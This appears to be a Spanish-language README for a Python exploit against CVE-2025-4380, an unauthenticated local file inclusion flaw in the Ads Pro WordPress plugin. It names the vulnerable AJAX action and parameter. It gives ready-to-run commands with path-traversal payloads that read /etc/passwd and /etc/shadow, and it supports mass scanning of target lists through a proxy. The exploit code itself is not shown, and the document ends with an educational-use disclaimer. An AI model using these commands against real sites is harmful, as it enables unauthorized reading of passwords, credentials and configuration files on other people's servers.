
Exploit en Python para CVE-2025-4380, una vulnerabilidad de Inclusión de Archivos Locales (Local File Inclusion) en el plugin Ads Pro de WordPress. Admite escaneo de objetivos individuales y masivos con soporte de proxy.
Este exploit en Python apunta a Ads Pro Plugin ≤ 4.89 para WordPress, vulnerable a Inclusión de Archivos Locales (LFI) a través de la acción AJAX bsa_preview_callback.
Un atacante no autenticado puede explotar esto para leer archivos arbitrarios del sistema de archivos del servidor, incluidos archivos sensibles como /etc/passwd, wp-config.php y otros.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
| Argumento | Descripción | Requerido |
|---|---|---|
-u, --url | URL objetivo (ej., http://target.com) | Opcional |
-l, --list | Archivo con lista de URLs objetivo | Opcional |
-p, --path | Ruta de archivo a incluir (ej., ../../etc/passwd) | Sí |
-o, --output | Archivo de salida para guardar los resultados | Opcional |
--proxy | Proxy (ej., http://127.0.0.1:8080) | Opcional |

Petición/Respuesta de Burpsuite


CVE-2025-4380
Ads Pro Plugin <= 4.89 - Inclusión de Archivos Locales mediante bsa_template en bsa_preview_callback
Este exploit se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.